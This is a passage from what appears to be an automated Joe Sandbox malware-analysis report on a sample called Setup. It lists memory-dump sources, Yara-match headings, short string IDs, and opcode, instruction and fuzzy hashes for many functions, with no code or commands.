                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 0-2766056989
                                                                                                                        • Opcode ID: ab015ad02a4c42f51c17f4c9533839d91b80fbd9bb7a55a8ac59f8b71208adfa
                                                                                                                        • Instruction ID: 4150fe49179c1bdc2a8be4ce2dd58f4a4c38104b910adf0cee87fe909c689f9a
                                                                                                                        • Opcode Fuzzy Hash: ab015ad02a4c42f51c17f4c9533839d91b80fbd9bb7a55a8ac59f8b71208adfa
                                                                                                                        • Instruction Fuzzy Hash: 9B4124B2E043108BDB14CF28C85576BB7A2FFC5318F198A2CD8995B790E779DA05CB81
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: WAAU
                                                                                                                        • API String ID: 0-4104508623
                                                                                                                        • Opcode ID: 35688d6c2370056d4882b7c5cc5caf38d82b7cb22c12d7645bf40361d90dee08
                                                                                                                        • Instruction ID: b87dd98aeed0ee0fe51f8b11fc6c3f762b7e00eb6071cdd292eb44ad735bd0aa
                                                                                                                        • Opcode Fuzzy Hash: 35688d6c2370056d4882b7c5cc5caf38d82b7cb22c12d7645bf40361d90dee08
                                                                                                                        • Instruction Fuzzy Hash: 1A41F96190C7E18BD73A8F2584507BBBFD5AF83605F1549ADC4E5AB182CB39830ACB17
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: WAAU
                                                                                                                        • API String ID: 0-4104508623
                                                                                                                        • Opcode ID: 3ef7437f98fb89dc4339ce1bc40ae35ca4c350c05fac62b71d6f86276f9bb0df
                                                                                                                        • Instruction ID: 6782ff44c2f9ae6295eb10ae874c37014dedb0a50192a2dcbf0333e9aff84812
                                                                                                                        • Opcode Fuzzy Hash: 3ef7437f98fb89dc4339ce1bc40ae35ca4c350c05fac62b71d6f86276f9bb0df
                                                                                                                        • Instruction Fuzzy Hash: 72411B6190C7E18BD7368F2584907BBFFD5AFC3205F5549ADC4D55B282CB39420ACB16
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: cH
                                                                                                                        • API String ID: 0-3891681731
                                                                                                                        • Opcode ID: 7c4413b265c45996c3b9db170e7fb2c42af75f07d063e841999d17076affaffb
                                                                                                                        • Instruction ID: c91ebd25d6aed5717a1ba7c65af0c926d494209d666e85c6cd4bd6375f89e820
                                                                                                                        • Opcode Fuzzy Hash: 7c4413b265c45996c3b9db170e7fb2c42af75f07d063e841999d17076affaffb
                                                                                                                        • Instruction Fuzzy Hash: 1A41D474D00316CBDB30CF44C8917BAB7B1FF86310F148268D9966BBA1EB78A945DB94
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: fg
                                                                                                                        • API String ID: 0-2712152613
                                                                                                                        • Opcode ID: db62bc0600cf742622f019289c701aba250c4324aa42d0085826d2b1e4279db8
                                                                                                                        • Instruction ID: fb944e48ba41c025f8b1dc0f9fe7772468d5b5ea251eac9dd891b106f98cbd2b
                                                                                                                        • Opcode Fuzzy Hash: db62bc0600cf742622f019289c701aba250c4324aa42d0085826d2b1e4279db8
                                                                                                                        • Instruction Fuzzy Hash: C94100B95083419BC3148F25C891A3BBBE1EFCA314F148A1DF4D597390E7398A06CB1B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: * !"
                                                                                                                        • API String ID: 0-2407105185
                                                                                                                        • Opcode ID: 225110f4b6aab5e380ee14a14d2d36ac1f2394b1ff815fe6bce8a455b11992e4
                                                                                                                        • Instruction ID: fcf92cde03e7c6a7602274d4287df39261535fc9134d23ba0b28c0e4eba6773f
                                                                                                                        • Opcode Fuzzy Hash: 225110f4b6aab5e380ee14a14d2d36ac1f2394b1ff815fe6bce8a455b11992e4
                                                                                                                        • Instruction Fuzzy Hash: F6313232B092604BD329CB248C577BBB2D7A7C6314F29867CC98AA7299DA748D018681
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: #def
                                                                                                                        • API String ID: 0-1615259583
                                                                                                                        • Opcode ID: 474a1fcdab7b61b5e5f5aac52a9838d88c9735344914809a0e88dab8abfbf6c8
                                                                                                                        • Instruction ID: cbb259cdd0552ab690514bfc4fc0f72ca2e809ed251f40fa8e6d96fb39613de4
                                                                                                                        • Opcode Fuzzy Hash: 474a1fcdab7b61b5e5f5aac52a9838d88c9735344914809a0e88dab8abfbf6c8
                                                                                                                        • Instruction Fuzzy Hash: E631043AB048518BDB4CDE29CC25679B7E3FBC530971AD1BDC50AD3364DE38AA4A8644
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: WAAU
                                                                                                                        • API String ID: 0-4104508623
                                                                                                                        • Opcode ID: eb030470507d45eaa47809d9a6c8fd8210fee4812082580b42a6506a9e43fc16
                                                                                                                        • Instruction ID: 15114d55252e56e41d2a6efcc7e91b5d3c73d0791343ede1b86932bcc610685d
                                                                                                                        • Opcode Fuzzy Hash: eb030470507d45eaa47809d9a6c8fd8210fee4812082580b42a6506a9e43fc16
                                                                                                                        • Instruction Fuzzy Hash: A531D96490C7E28BD7368F2584507BBBBE49B83605F0548ADC5E9AF183CB34830ACB17
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: kR
                                                                                                                        • API String ID: 0-3027156200
                                                                                                                        • Opcode ID: a7ebf3cc282c086933dadc612e595ad28a72bc77ac7eff6582a9fb32bdb763a6
                                                                                                                        • Instruction ID: ea5253b9020cc4308f2f7194c47a72955921b492e57053c7e1b6254fa4ad2c1e
                                                                                                                        • Opcode Fuzzy Hash: a7ebf3cc282c086933dadc612e595ad28a72bc77ac7eff6582a9fb32bdb763a6
                                                                                                                        • Instruction Fuzzy Hash: 0C2106F4916A42AFDB018F26FC11B1ABBB1BF47300B109A78D4488B311EB39A465DF85
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: kR
                                                                                                                        • API String ID: 0-3027156200
                                                                                                                        • Opcode ID: 974bc6c75dfc4f2cb1556d84c3041c1196872c1b59b4579d8c97f35fd9002bb2
                                                                                                                        • Instruction ID: dbffb19377b00563220315cfd11abe865fe9e2c2330797470b9c750f410de7bc
                                                                                                                        • Opcode Fuzzy Hash: 974bc6c75dfc4f2cb1556d84c3041c1196872c1b59b4579d8c97f35fd9002bb2
                                                                                                                        • Instruction Fuzzy Hash: CC0126F4925A429FDB018F22EC11B2ABBB1BF47300B109938C4498B311EB39E421DF85
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b325d01681261994c5e97ca79d6315eba18d9df0c506adad844aa4914549bc66
                                                                                                                        • Instruction ID: 58fa61c985e7b04ebfc65f6d4e0783e051812772b59a927addce12271a04a2b2
                                                                                                                        • Opcode Fuzzy Hash: b325d01681261994c5e97ca79d6315eba18d9df0c506adad844aa4914549bc66
                                                                                                                        • Instruction Fuzzy Hash: 6E52A470908B849FEB35CB24C8D47A7BBE1AFC1314F148E6DD5EA06AC2C379A685C715
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 310d3ab3e520911b944654895b1f1787e66a8e9227b83f2c760c6cd34f91e768
                                                                                                                        • Instruction ID: 274d3406441c69734fd0ccc04be92803220e5afb18f917c46190f06f0a8964f7
                                                                                                                        • Opcode Fuzzy Hash: 310d3ab3e520911b944654895b1f1787e66a8e9227b83f2c760c6cd34f91e768
                                                                                                                        • Instruction Fuzzy Hash: 9652D0715083858BCB28CF19C0D06ABBBE1BFC9318F198A6DE9D957381D774E949CB81
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 92935db9df340ce926184e16ae1e993745bb69002ea50ba942ceea2fa3e46154
                                                                                                                        • Instruction ID: e3164ac55babbfad01f8d5f6b7ea41cc89667cfc3f10106ac2f0e3a63e14c134
                                                                                                                        • Opcode Fuzzy Hash: 92935db9df340ce926184e16ae1e993745bb69002ea50ba942ceea2fa3e46154
                                                                                                                        • Instruction Fuzzy Hash: 9112D4326087118BC724DF28D8C07ABB3E2FFC4719F198A3DD99597281D735A955CB82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c185013b644f507bb8d49bb4ac1866ffca036e7a686b3ad08de9647f7ccf1a7a
                                                                                                                        • Instruction ID: f6c60f2d27ef515fb3e18860aac7010864ee8e180c41644fbf96c2154b2a1d01
                                                                                                                        • Opcode Fuzzy Hash: c185013b644f507bb8d49bb4ac1866ffca036e7a686b3ad08de9647f7ccf1a7a
                                                                                                                        • Instruction Fuzzy Hash: AE3210B4915B108FC378CF29C5D062ABBF2BF85650B904A2ED6A787A90D736F845CF14
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f2ab818e033123b234283f5e5587be4d532ba629ab03afca2c681e9f0eac0d0f
                                                                                                                        • Instruction ID: 1ba4f8906f5e3b831c2b1efa61669098199de9d85db780cb52b8396fbabe7103
                                                                                                                        • Opcode Fuzzy Hash: f2ab818e033123b234283f5e5587be4d532ba629ab03afca2c681e9f0eac0d0f
                                                                                                                        • Instruction Fuzzy Hash: 24522AB0618B818ED361CF3C8845787BFE5AB1A314F048A9DE0EEC7392D7756501CB66
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2e3580c7125a9ab367873b3761cd09f287d1fccd75d3880a118edf97094cf939
                                                                                                                        • Instruction ID: 2ecb55931f7ee19ec00f8a5885bdb38691b0a6a68630f5b13ee893f64ee6e6d4
                                                                                                                        • Opcode Fuzzy Hash: 2e3580c7125a9ab367873b3761cd09f287d1fccd75d3880a118edf97094cf939
                                                                                                                        • Instruction Fuzzy Hash: 23E110715483108BD724DF28C892367B3A2FFD6764F189A2CE8C24B3D5E7799906D386
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8892d92dfb930d005f8f87b689991ce430780d04960a043c18d4229532a6d61e
                                                                                                                        • Instruction ID: d0721e7c5d9b387bb26d1f58e189232c839ca286621c701ee8108c1e738d68c2
                                                                                                                        • Opcode Fuzzy Hash: 8892d92dfb930d005f8f87b689991ce430780d04960a043c18d4229532a6d61e
                                                                                                                        • Instruction Fuzzy Hash: E6C157B2A142A097D718DF29CC5277B72E6EFD1314F09847DE886C7290EB7CDA098791
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cbe223a6731c722bf0ac73205d81284fd3f0283b84c4b0446aa313054472bd49
                                                                                                                        • Instruction ID: d8f76bc961a107fca0d85b3872f1c9a847c71962c879fdbe22d8f91c3a260120
                                                                                                                        • Opcode Fuzzy Hash: cbe223a6731c722bf0ac73205d81284fd3f0283b84c4b0446aa313054472bd49
                                                                                                                        • Instruction Fuzzy Hash: 05B122B1A443114BD716CF25C881B2BB7A2FBC5718F188E2CF58567291DB75EA01CB92
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6854e1d88536e3097840bd3716632503875fd93950ef39c5c87dfceabf3fac45
                                                                                                                        • Instruction ID: 9fb3f7834c6c5b83d74d84250335fb8c1fc7f83a0d6c6b02dec17535dbc2fa90
                                                                                                                        • Opcode Fuzzy Hash: 6854e1d88536e3097840bd3716632503875fd93950ef39c5c87dfceabf3fac45
                                                                                                                        • Instruction Fuzzy Hash: 62E166712083818FD725CF69C880A6BFBE5EF98204F448C2DE5D987791E375E948CB92
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 98636f8c7783fa0e5325c9e80dd60c13771eb6ea4cebaecc0ae169933844e781
                                                                                                                        • Instruction ID: fb1c8ff8af88e49e31ae788bb9db46d09dd113e14272fb9325e8a5c874ffd6e0
                                                                                                                        • Opcode Fuzzy Hash: 98636f8c7783fa0e5325c9e80dd60c13771eb6ea4cebaecc0ae169933844e781
                                                                                                                        • Instruction Fuzzy Hash: 04C159B2A443218BD724CF6988C177BF7A2EFD1614F09852DE8859B341EB74DA0EC791
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e50183c4387bb2d4731661e673ec24aeecd1b3cf1cec24ccd1db5fb51896a36a
                                                                                                                        • Instruction ID: e46b7028274695e0c82ade6835ca1ed74747b57ed4347d3547f4ecbba6f1e6f6
                                                                                                                        • Opcode Fuzzy Hash: e50183c4387bb2d4731661e673ec24aeecd1b3cf1cec24ccd1db5fb51896a36a
                                                                                                                        • Instruction Fuzzy Hash: 35B1BCB01083508BD720DF25C85276BB7F1FF96314F188A1CE9DA8B3A1EBB59605CB56
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 01f680fe73645b4a7008eecc6e8290f12a07befb8ec17793cb454887f94730f7
                                                                                                                        • Instruction ID: 3af2f9ea5d6a0d27fdd4e065c8689d1a8515ac0b309827f2748773fc22cf8d78
                                                                                                                        • Opcode Fuzzy Hash: 01f680fe73645b4a7008eecc6e8290f12a07befb8ec17793cb454887f94730f7
                                                                                                                        • Instruction Fuzzy Hash: 51B1B075504301AFD7119F24DC42B1ABBE2BFDA315F248A2DF8D8932A0D7729A19DF42
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4a7a26b8535cd119af1dd581f4e5d9044d51e87aa2cb25220f2a9df3ee239fd8
                                                                                                                        • Instruction ID: ab66e333c1dd0c101f5c8bd0ec6d92d9ad9ef8b706b5245e23259a5027cb7056
                                                                                                                        • Opcode Fuzzy Hash: 4a7a26b8535cd119af1dd581f4e5d9044d51e87aa2cb25220f2a9df3ee239fd8
                                                                                                                        • Instruction Fuzzy Hash: 40A104356083119FC72ADF28D890AAFB3E2FFC5704F09892CE98297251DB75A941CB85
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7bd334903a24bb709d293d13844b2398562db1763a6f586426968c4e2950a9ab
                                                                                                                        • Instruction ID: 56c203ead400e3781c4441e576c99ae7d06fd2e78f062c632a9404248c5adf92
                                                                                                                        • Opcode Fuzzy Hash: 7bd334903a24bb709d293d13844b2398562db1763a6f586426968c4e2950a9ab
                                                                                                                        • Instruction Fuzzy Hash: 22913576A487109BD3249F588891A7FB3A7FBCA310F2A453CD9C5A3221C731AE41DBC5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 765c67244198d371fd1aa846970a1d82d31fadedbd822a15b67d5a8120b8ce19
                                                                                                                        • Instruction ID: a29abb7c2d5cd56c07a60383f17c1a98653f21eb6de6795239af8efcf51fc64b
                                                                                                                        • Opcode Fuzzy Hash: 765c67244198d371fd1aa846970a1d82d31fadedbd822a15b67d5a8120b8ce19
                                                                                                                        • Instruction Fuzzy Hash: 7C910435A043029BD715DF28D890A6BB3F2FFD9714F09896CE9858B351EB70E951CB82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9fd56f46f9b34401e6af5e4cf16cdde13d6b2c11c969ca6269032b224b060b14
                                                                                                                        • Instruction ID: da4c49420b79e633a5d5fd86f17b7ae846a43d797fd9f8782d06eeb1929acd80
                                                                                                                        • Opcode Fuzzy Hash: 9fd56f46f9b34401e6af5e4cf16cdde13d6b2c11c969ca6269032b224b060b14
                                                                                                                        • Instruction Fuzzy Hash: 73C14DB2A487418FC364CF68CC96BABB7F1BF85318F08492DD1D9C6242E778A159CB45
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 83acea30d6309907a32d906ff92cad53d0d1e7482b09615186a64eb07fdd2097
                                                                                                                        • Instruction ID: 79173a01c364f3393156940e8e752a2ec659147ac154a01a47c432b4768dd08b
                                                                                                                        • Opcode Fuzzy Hash: 83acea30d6309907a32d906ff92cad53d0d1e7482b09615186a64eb07fdd2097
                                                                                                                        • Instruction Fuzzy Hash: 837135366082119BDB15AF28D850A7FB3A2FFC9354F19CD3CE9869B251EB30E951C781
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8fe6db8f875b7494c6cd9b6f53dbd67bdb8f1bb29b3304646f1c188fc729e09f
                                                                                                                        • Instruction ID: d4395f3e8cf472219e9c95064f212f7baea212da1ca9d1a528e589f4f413b986
                                                                                                                        • Opcode Fuzzy Hash: 8fe6db8f875b7494c6cd9b6f53dbd67bdb8f1bb29b3304646f1c188fc729e09f
                                                                                                                        • Instruction Fuzzy Hash: E9915A729083218BD324CF24C8916ABB7F1FFC9714F199A2DE8C96B354E7749901D746
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 922fb23eb5f0144428ae20a9b2de5ded90fe122d3494cbcdd153d0fb13965e0f
                                                                                                                        • Instruction ID: 9a9343257ab80e74ec77f709d797df9c727bc33967320338961a7a542c861bcd
                                                                                                                        • Opcode Fuzzy Hash: 922fb23eb5f0144428ae20a9b2de5ded90fe122d3494cbcdd153d0fb13965e0f
                                                                                                                        • Instruction Fuzzy Hash: 3C51212BA14B380B5B9DC87E4CA92B95043E3C1245BD6F32EDAA7DF589DE35488305C2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 04cb8286c079d5b0a48557f013255d7b2ba8412ba69440a0d19fa53712b09dde
                                                                                                                        • Instruction ID: 0a3eef0e3f157f5deb7981a28d9d76b76d70e4300e984d23273015d4cce76e84
                                                                                                                        • Opcode Fuzzy Hash: 04cb8286c079d5b0a48557f013255d7b2ba8412ba69440a0d19fa53712b09dde
                                                                                                                        • Instruction Fuzzy Hash: C7510F726083008BD7159F29DC81B6AB7E2EBC5314F198D3CE4C8AB251EB31AD61CB41
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cdf1d8d1aab28a2c2cb85d604e1961266adf6e387764606ce41cea01e3ef79f6
                                                                                                                        • Instruction ID: d845b3fac516ea9506a1262a89e5b3aa7cb414014f7ef9e23bcdcba5c34816b8
                                                                                                                        • Opcode Fuzzy Hash: cdf1d8d1aab28a2c2cb85d604e1961266adf6e387764606ce41cea01e3ef79f6
                                                                                                                        • Instruction Fuzzy Hash: D3614B3375AB904BE3388D3D5C522AABA835BD3234B2DC77DD5B5873E5D57448029344
                                                                                                                        Memory Dump Source
